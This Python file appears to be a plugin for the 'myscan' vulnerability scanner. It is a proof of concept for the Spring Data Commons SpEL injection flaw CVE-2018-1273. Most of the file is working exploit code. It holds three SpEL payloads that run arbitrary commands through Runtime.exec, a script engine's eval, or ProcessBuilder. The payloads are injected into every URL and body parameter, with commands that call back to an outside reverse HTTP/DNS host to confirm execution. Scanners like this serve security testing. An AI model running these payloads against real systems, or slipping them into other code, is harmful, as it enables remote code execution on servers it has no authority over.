# !/usr/bin/env python3
# @Time    : 2020/11/24
# @Author  : caicai
# @File    : poc_srping_cve-2018-1273_2018.py
from myscan.lib.parse.dictdata_parser import dictdata_parser  # 写了一些操作dictdata的方法的类
from myscan.lib.core.base import PocBase
from myscan.lib.core.common_reverse import generate, query_reverse, generate_reverse_payloads
from myscan.lib.core.threads import mythread
from myscan.lib.helper.request import request  # 修改了requests.request请求的库，建议使用此库，会在redis计数
from myscan.config import reverse_set

'''
验证这个漏洞代价比较大

poc不好写，先判断是不是spring框架，通过简单的文件扩展名后缀来判断
其次不可能每个包都发payload，发包太大，而且还需要反连平台，先暂定urlencode的类型。

'''


class POC(PocBase):
    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # python的dict数据，详情请看docs/开发指南Example dict数据示例
        self.parse = dictdata_parser(self.dictdata)
        self.url = workdata.get(
            "data")  # self.url为需要测试的url，但不会包含url参数，如https://www.baidu.com/index.php#tip1 .不会携带url参数，如?keyword=1
        self.result = []  # 此result保存dict数据，dict需包含name,url,level,detail字段，detail字段值必须为dict。如下self.result.append代码
        self.name = "srping_cve-2018-1273"
        self.vulmsg = "detail:https://github.com/vulhub/vulhub/tree/master/spring/CVE-2018-1273"
        self.level = 2  # 0:Low  1:Medium 2:High
        self.saveflags = {}
        self.payloads = [
            ('''[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("%s")]''', lambda x: x),
            (
                '''[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('%s')")]''',
                lambda x: x),
            (
                '''[(#root.getClass().forName("java.lang.ProcessBuilder").getConstructor('foo'.split('').getClass()).newInstance('%s'.split('xxxxxx'))).start()]''',
                lambda x: "xxxxxx".join(x.split(" ")))
        ]
        self.hexdatas = []

    def verify(self):
        if self.dictdata.get("url").get("extension") not in "":
            return
        if not self.can_output(self.parse.getrootpath() + self.name):  # 限定只输出一次
            return
        self.parse = dictdata_parser(self.dictdata)

        reqs = []
        params = self.dictdata.get("request").get("params").get("params_url")

        # body为urlencode类型
        if self.dictdata.get("request").get("content_type") == 1:  # data数据类型为urlencode
            params += self.dictdata.get("request").get("params").get("params_body")

        # gen,payload 具体参数自己慢慢测试吧，没标定是那个参数
        cmds = []
        payloads_, hexdata = generate_reverse_payloads(self.name)
        _, dnshexdata = generate_reverse_payloads(self.name, "dns")
        for payload in payloads_:
            cmds.append(payload)
            cmds.append(payload.replace(reverse_set.get("reverse_http_ip"), dnshexdata))

        for param in params:
            for cmd in cmds:
                for payload, func in self.payloads:
                    payload = payload % (func(cmd))
                    req = self.parse.getreqfromparam(param, "a", payload, False)
                    reqs.append(req)
        # send it

        mythread(self.send, reqs)

        # query
        sleep = True
        for hexdata in [hexdata, dnshexdata]:
            query_res, _ = query_reverse(hexdata, sleep)
            sleep = False
            if query_res:
                self.result.append({
                    "name": self.name,
                    "url": self.parse.getrootpath(),
                    "level": self.level,  # 0:Low  1:Medium 2:High
                    "detail": {
                        "vulmsg": self.vulmsg,
                        "others:": "{} in dnslog".format(hexdata),
                        "request": self.parse.getrequestraw(),
                        "response": self.parse.getresponseraw()
                    }
                })
                self.can_output(self.parse.getrootpath() + self.name, True)
                break

    def send(self, req):
        r = request(**req)
